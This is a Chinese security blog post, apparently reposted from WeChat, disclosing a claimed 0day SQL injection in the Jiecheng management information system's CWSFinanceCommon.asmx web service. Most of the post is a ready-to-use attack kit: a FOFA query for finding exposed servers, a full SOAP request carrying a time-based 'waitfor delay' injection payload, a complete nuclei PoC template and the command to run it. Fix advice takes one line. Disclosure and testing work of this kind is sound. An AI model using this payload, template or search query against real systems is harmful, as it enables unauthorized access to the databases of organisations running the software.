【0day】捷诚管理信息系统CWSFinanceCommon SQL注入漏洞(附nuclei poc)

admin

102795
文章

87
评论

2024年1月10日16:47:49评论29 views字数 2049阅读6分49秒阅读模式

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

—

漏洞名称

捷诚管理信息系统 CWSFinanceCommon.asmx sql注入漏洞

—

漏洞影响

捷诚管理信息系统

【0day】捷诚管理信息系统CWSFinanceCommon SQL注入漏洞(附nuclei poc)

—

漏洞描述

捷诚管理信息系统是一款功能全面，可以支持自营、联营到外柜租赁的管理，其自身带工作流管理工具，能够帮助企业有效的开展内部审批工作。该系统CWSFinanceCommon.asmx存在sql注入漏洞。黑客可以通过该漏洞获取数据库敏感信息，甚至远控服务器。

—

FOFA搜索语句

body="/Scripts/EnjoyMsg.js"

【0day】捷诚管理信息系统CWSFinanceCommon SQL注入漏洞(附nuclei poc)

—

漏洞复现

向靶场发送如下数据包

POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1Host: 192.168.86.128:9001User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36Connection: closeContent-Length: 369Accept: */*Accept-Language: enContent-Type: text/xml; charset=utf-8Accept-Encoding: gzip<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">  <soap:Body>    <GetOSpById xmlns="http://tempuri.org/">      <sId>1';waitfor delay '0:0:5'--+</sId>    </GetOSpById>  </soap:Body></soap:Envelope>

【0day】捷诚管理信息系统CWSFinanceCommon SQL注入漏洞(附nuclei poc)

证明存在漏洞

—

nuclei poc

poc文件内容如下

id: jiecheng-CWSFinanceCommon-sqliinfo:  name: 捷诚管理信息系统 CWSFinanceCommon.asmx SQL注入漏洞  author: fgz  severity: high  description: '捷诚管理信息系统是一款功能全面，可以支持自营、联营到外柜租赁的管理，其自身带工作流管理工具，能够帮助企业有效的开展内部审批工作。该系统CWSFinanceCommon.asmx 存在sql注入漏洞。黑客可以通过该漏洞获取数据库敏感信息，甚至远控服务器。'  tags: 2023,jiecheng,sqli  metadata:    max-request: 3    fofa-query: body="/Scripts/EnjoyMsg.js"    verified: truehttp:  - method: POST    path:      - "{{BaseURL}}/EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx"    headers:      Content-Type: text/xml; charset=utf-8    body: "<?xml version="1.0" encoding="utf-8"?>n<soap:Envelope xmlns:xsi="      http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"       xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">n  <soap:Body>n          <GetOSpById xmlns="http://tempuri.org/">n      <sId>1';waitfor delay       '0:0:5'--+</sId>n    </GetOSpById>n  </soap:Body>n</soap:Envelope>"    matchers:      - type: dsl        dsl:          - "status_code == 200 && duration>=5 && duration<=6"

运行POC

nuclei.exe -t mypoc/其他/jiecheng-CWSFinanceCommon-sqli.yaml -u http://192.168.86.128:9001

【0day】捷诚管理信息系统CWSFinanceCommon SQL注入漏洞(附nuclei poc)

—

修复建议

请关注厂商补丁公告信息及时打补丁，或者部署waf产品进行防护。

原文始发于微信公众号（AI与网安）：【0day】捷诚管理信息系统CWSFinanceCommon SQL注入漏洞(附nuclei poc)

左青龙
微信扫一扫

右白虎
微信扫一扫

【0day】捷诚管理信息系统CWSFinanceCommon SQL注入漏洞(附nuclei poc)

CVE-2024-28253 :OpenMetadata

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

发表评论

在线咨询

微信